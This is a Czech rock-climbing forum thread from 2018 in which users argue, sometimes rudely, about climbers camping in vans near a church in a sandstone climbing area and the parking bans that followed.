    odpovědět 
     Re: špatná karma08:52:29 13.06.2018
    Hele, i když mne to vůbec nezajímá, tak za poslední roky jsem i já zaregistroval řadu článků, kde se právě na tebou vyjmenované věci upozorňuje. Opakovaně. Až jsem si u posledního říkal, že to těm debilům nezakáží úplně. Takže ne žádný blesk z čistého nebe, ale dlouhodobý problém, na který bylo opakovaně poukazováno a u kterého bylo několikrát marně žádáno o nápravu.
    odpovědět 
      Re: špatná karma11:27:18 14.06.2018
    Jo? Kde? Já ne, pak jsem se spletl.
    Ale já teda být místní, tak tam volám policajty, uděláš to párkrát, pár pokut a nočních odjezdů a lidi si to dvakrát rozmyslí...
    odpovědět 
     Re: špatná karma10:26:24 14.06.2018
    Jen tak na okraj... dodávku za mega má fakt málokdo, jestli's na tom místě o kterém se tady diskutuje vůbec někdy byl tak asi víš, že většina těch aut byly spíše 15 - 20 let staré VW T4 a podobné popelnice za cenu kvalitnějšího horského kola... chápu ale že když člověk (čech) nemá ani na tu starou 20i letou herku tak to těm ostatním závidí a bude jim tlačit at jezdí (taky) vlakem, že je to hrozná romantika a že O TOM je přece lezení na písku
    Pavelodpovědět 
      Re: špatná karma11:13:16 14.06.2018
    Tak to jo, kdyz je 15 - 20 let stare, tak to by se melo tolerovat! O tom jiste to zdeleni na ktere reagujes bylo.
    A urcite, kdyz to nekomu vadi, tak je to ze zavisti, to da prece rozum! (v mentalite lezcu, kteri fakt asi maji v hlavach hodne temno, ze za vsim vidi jen zavist ostatnich...)
    odpovědět 
      Re: špatná karma11:24:47 14.06.2018
    Aaaa, anti-závistivec se chytil. Kde jsem napsal, že na něco nemám? Eventuelně, co mám a nemám. Co je to za blbý argument? to je daleko horší než můj odhad ceny. A chceš mi tvrdit, že tam nikdo nikdy nebyl v tak drahém autě, že je žádní lezci nemají? Tvrdíš, že všechny labutě jsou bílé, ale já říkám, že jedna je určitě černá. Nikterak jsem nekvatifikoval kolik tam takových lidí je.
    Ale aby jsi se s tou dodávkou nebál někam dojet, tak buď je relativně zánovní a tedy drahá, anebo jsi do ní něco nasypal, tak jako tak to něco stojí.
    A cca. mega nová stojí, tedy formálně mám pravdu, tak si nech řeči od cesty.
    Dále usuzuješ, že jsem tam nikdy nebyl, páč nemám přesnou statistiku, čím tam kdo jezdí? Fíha... Ty děláš u AAA, že každý auto odhadneš na místě a ukládáš do paměti a svět je pro tebe představovám sítí silnic po které jezdí cenovky?
    Ignoruješ jádro pudla a to, že lidi, kteří mají na dodávku a všechny ty lezecký cajky se chovají blbě a kvůli škudlení pár kaček, event. minut tam teď člověk, který se třeba choval slušně a třeba tam nespal nedojede a nezaparkuje.

    Dovolím si také bohapustou spekulaci, že jsi potrefená husa s dodávkou, která si žije svůj egosen o neomezené svobodě s autem, kde se dá přespat, už nedá, kvůli tobě. Anebo se pletu?
    odpovědět 
       Re: špatná karma13:09:36 14.06.2018
    Tak to už člověk musí být fakt hustej, aby si koupil třeba nový VW California za 1.5 mega a zaparkoval ji v lese u Děčína a na celý den odešel :-)))
    odpovědět 
        Re: špatná karma13:20:07 14.06.2018
    Hustej může být jenom Adam ;)
    odpovědět 
        Re: špatná karma17:42:05 14.06.2018
    Presne. S takovym autem se zasadne nejezdi. Natoz pak nekde parkuje. Nejlepe, kdyz je cely rok zavrene v garazi s najezdem 0 km!
    odpovědět 
       Re: špatná karma20:13:09 14.06.2018
    Nenapsal jsem ani "nikdo", ani "nikdy", ani "žádné". Tedy ani že "všechny" labutě jsou bílé. Napsal jsem "málokdo". A to je prostě pravda.

    VW T4 jako nové možná před těmi 20 lety milion stálo, takže máš fakt pravdu, fakt ses nemýlil, fakt to tak je, máš bod.

    Auta pro mě jezdící cenovky nejsou, ale pár aut už jsem měl a občas se koukám, co kolik stojí (hlavně tedy ty dodávky), takže vím, že 15-20 leté staré plechovky milion nestojí. Ani ty 10 let staré.

    A poslední bod - tvá spekulace je správná, dodávku mám (ale jen za cca 200 000, takze taky nepatrim mezi ty davy lezcu milionaru, o kterych tady mluvis), svůj egosen žiju rozhodne, protoze na skalách (především v té dodávce) trávím řekněme 150 dní v roce, a způsob jak prespat/zaparkovat v Labáku se urcite zase nejaký najde, o to se nebojím. (btw v Labecu jsem u kostela ani nikde pobliz nikdy nespal, vzdy jen na podiu u Kosti)

    ... ale na zaver, jedna vec je fakt nezpochybnitelna - vsichni ty lidi, co spali v autech u kostela, museli chodit nekde srát (tj treba 20 hoven denne), a já se ptám - kde???
    Pavelodpovědět 
       Re: špatná karma20:21:18 14.06.2018
    https://www.youtube.com/watch?v=_ct6T6Uzb30

    Odpověď možná nalezneme v textu písně
    Pavelodpovědět 
       Re: špatná karma20:26:43 14.06.2018
    https://www.youtube.com/watch?v=_ct6T6Uzb30

    Odpověď možná nalezneme v textu písně
    Pavelodpovědět 

     Foto dne:

    Agnes
     Databáze cest:
    Všechny cesty (179372)
    Top cesty v ČR
    Top bouldery v ČR
    Nejnovější cesty:
    1. Senza Nome 6a+ Coltura
    Hrebeň Končisté 3 Batizovská Dolina
    JZ Komín III Prachov
    Foreign Afair 6a Krraba
    Shadow On The Wall 6b Krraba
    Nově komentované:
    Souhvězdí Marmota 7C Hradby U Kozla
    Příště To Zalepím :) 7C+/8A Tisá - Modřín
    Paradisi Mussulmani 6b+ Jerzu
    Tesoro Mio 7+ Geyikbayiri
    Absinth 9- Geyikbayiri

     Nově v diskusi:
    Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Re: Přírodní kotevní body a jejich použití pro jištěí, slanování | Přírodní kotevní body a jejich použití pro jištěí, slanování... | Re: Slanění z nýtu |

     Nové komentáře:
    Re: Problém na sestupu | Re: Problém na sestupu | Re: Problém na sestupu | Re: Cesta Járy Vdolečka | Re: Cesta Járy Vdolečka | Re: Cesta Járy Vdolečka | Re: Cesta | Re: Problém na sestupu | Re: Problém na sestupu | Problém na sestupu |

     Kde to vře:
    Ukrajinský top lezec Maksym Petrenko padl při obraně Ukrajiny (50)
    Mára Holeček a Ondrej Húserka vylezli na vrchol Langtangu (29)
    Video: Seb Bouin a Alain Robert lezou solo na mrakodrap v Paříži (22)
    Will Bosi přelezl boulder Spots of Time a potvrdil klasu 9A (17)
    MČR v rychlolezení (16)
    Film: Adam Ondra a nejtěžší cesta Vysokých Tater Corona 10+/11- (15)
    Secret Spot Bouldering 2024 pozvánka (12)
    MČR v bouldru vyhráli Lukáš Mokroluský a Michaela Smetanová (5)
    Marjan (4)
    Expedice Máry Holečka na Langtang Lirung se chystá do stěny (4)

     Nově v inzerci:
    druhý konec lana | Batoh Deuter Aircontact 65+10l | Z teplem | Hledám děvče do skal | koupím Zlagboard | Kalhoty MONTURA SKI STYLE PANTS Man vel.L | Nepromokavá bunda The North Face vel.L | Nové lezečky Scarpa Instinct VSR vel. 43,5 | Srbsko | boulder pytel EVOLV |

     Anketa:
    Jaké technologie nebo aplikace používáte při lezení a jak vám pomáhají?
     GPS a mapové aplikace 
     359 
     Lezecké aplikace pro sledování výkonu 
     314 
     Sociální sítě pro sdílení a inspiraci 
     284 
     Vzdělávací aplikace pro techniky a trénink 
     285 
     Aplikace pro evidenci a sdílení výstupů 
     254 

     Návody:
    Jak psát na lezce ...
    Lezecké mapy

     Partneři:
    Treking.cz
    Hledáte si pěkné ubytování v ČR na Váš výlet či dovolenou? Vyberte si na webu MegaUbytko.cz v sekci chaty a chalupy pronájem. Pokud plánujete cestovat na Slovensko a potřebujete ubytovanie na Slovensku, ty nejlepší ubytovací zařízení, chaty, chalupy, roubenky naleznete na stránce chaty na prenájom.

     lezec  diskuse  ankety  odkazy  průvodce  fotky  video  *rss*  ochrana osobních údajů       ceník reklamy Energy Cloud   NetPro systems, s.r.o.